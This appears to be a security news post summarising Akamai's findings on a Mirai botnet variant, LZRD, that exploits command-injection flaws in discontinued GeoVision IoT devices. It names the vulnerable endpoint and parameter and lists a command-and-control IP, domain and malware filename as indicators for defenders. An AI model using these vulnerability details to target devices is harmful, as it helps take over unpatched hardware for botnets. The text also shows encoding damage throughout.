Listen to this Post
A Growing Menace: Mirai Malware Evolves Amid Rising IoT Vulnerabilities
In a concerning turn of events, cybersecurity researchers at Akamai have confirmed the first active exploitation of two critical command injection vulnerabilitiesâCVE-2024-6047 and CVE-2024-11120âaffecting discontinued GeoVision IoT devices. This campaign, detected via Akamaiâs global honeypots in April 2025, reveals a stark reminder: unsupported IoT hardware remains a silent threat within many networks.
These vulnerabilities were originally disclosed in mid-2024, but only now have they been weaponized in the wild. At the core of the attack lies a simple yet devastating vectorâunsanitized input on the /DateSetting.cgi endpoint, allowing unauthenticated attackers to execute remote commands without user interaction. The malware payload? A revamped Mirai variant dubbed âLZRDâ, aimed at building a massive botnet capable of large-scale network disruption.
This wave of exploitation is far from isolated. It forms part of a broader offensive targeting a range of obsolete IoT devices, including known flaws in ZTE routers, DigiEver systems, and Hadoop YARN. These attacks reinforce the cybersecurity communityâs growing concern: legacy IoT hardware, often unmonitored and unpatched, is the low-hanging fruit for todayâs cyber adversaries.
The Story Unfolded â Key Developments at a Glance
Akamai SIRT has identified active exploitation of two command injection flaws: CVE-2024-6047 and CVE-2024-11120.
Attacks began surfacing through honeypots in April 2025, nearly a year after the vulnerabilities were publicly disclosed.
The exploits target the /DateSetting.cgi endpoint on outdated GeoVision IoT devices.
The vulnerability in question allows remote attackers to run arbitrary system commands via the szSrvIpAddr parameterâwith no need for authentication.
Threat actors deploy a new Mirai-based malware variant named LZRD, mainly affecting ARM-based devices.
Once executed, LZRD performs standard Mirai-style attacks, such as UDP floods, TCP SYN, and custom DDoS modules.
The malware includes hard-coded command-and-control (C2) IPs, proving centralized orchestration.
C2 banners link the campaign to older TBOTNET infrastructure, signaling a resurgence and adaptation of long-standing botnets.
The campaign also exploits other known flaws, including:
Hadoop YARN bugs
CVE-2018-10561 in ZTE ZXV10 H108L routers
Legacy DigiEver vulnerabilities
Akamaiâs analysis stresses that attackers aim to hijack as many unpatched devices as possible to expand their botnet network.
GeoVision has confirmed the affected devices are discontinued and will not receive patches.
Security experts urge affected organizations to retire unsupported hardware immediately.
In cases where decommissioning isnât feasible, network-level defenses and IOC-based monitoring are vital.
Akamai continues to monitor the botnetâs activity and has shared a list of Indicators of Compromise (IOCs).
The C2 IPs and domains include:
`209.141.44.28`
`connect.antiwifi.dev`
And multiple SHA256 hashes of malicious binaries
The malware has been observed under filenames such as boatnet.arm7, a hallmark of Miraiâs evolving attack arsenal.
The ongoing campaign reiterates a critical cybersecurity lesson: old IoT tech never truly diesâit just gets recruited.
What Undercode Say:
The exploitation of CVE-2024-6047 and CVE-2024-11120 is a textbook case of a botnet resurgence fueled by long-abandoned tech. While these vulnerabilities were disclosed nearly a year ago, the reality is clear: awareness alone doesnât equal security. Countless organizations continue to operate on end-of-life (EOL) devices, either due to budgetary limitations or operational inertia. This complacency is precisely what cybercriminals bank on.
The usage of the /DateSetting.cgi endpoint as a gateway for system compromise reveals how even seemingly trivial endpoints can serve as critical entry points when input validation is neglected. The LZRD Mirai variant, although structurally similar to past iterations, shows refinements in coordination, modularity, and centralized control, emphasizing that botnets are evolvingânot disappearing.
The reappearance of infrastructure previously tied to the TBOTNET family suggests that adversaries are repurposing reliable tactics and infrastructure, layering newer tools onto older playbooks. This kind of strategic adaptation is not just cleverâitâs cost-effective and efficient. Threat actors donât need to develop entirely new malware when repackaging existing code proves just as effective.
Moreover, the fact that this campaign also targets other known IoT vulnerabilitiesâsome dating back to 2018âunderscores a systemic failure in IoT lifecycle management. Devices that are no longer supported by vendors but remain in use create blind spots in corporate defense systems. In this case, GeoVision has already declared the devices obsolete, making patching an impossibility.
This places defenders in a tight spot: either decommission or build network armor around inherently vulnerable gear. The problem is that many organizations don’t have visibility into their full device inventory, let alone the capability to isolate legacy systems. Thatâs where the Indicators of Compromise provided by Akamai become essentialâthey offer a tactical means to detect ongoing compromise even when strategic fixes aren’t possible.
Cybersecurity isnât just about firewalls and zero-trustâitâs about knowing whatâs in your network and ensuring itâs not a ticking time bomb. The exploit chain used here is not innovativeâbut it is effective, and effectiveness is all that matters to threat actors. Until organizations fully embrace IoT lifecycle hygiene, these kinds of botnet campaigns will continue to flourish.
Fact Checker Results:
The CVEs (2024-6047 and 2024-11120) are officially registered and tied to GeoVision device vulnerabilities.
Akamai
Mirai-based variants like LZRD have been observed in other ARM-targeting malware families since early 2025.
Prediction:
Expect continued growth in hybrid botnets targeting unpatched IoT hardware, with malware variants like LZRD evolving further. Without aggressive decommissioning of unsupported devices, this trend will persist well into 2026. Cybercrime groups will increasingly automate scanning for such vulnerabilities, folding them into larger malware-as-a-service operations.
References:
Reported By: cyberpress.org
Extra Source Hub:
https://www.reddit.com
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
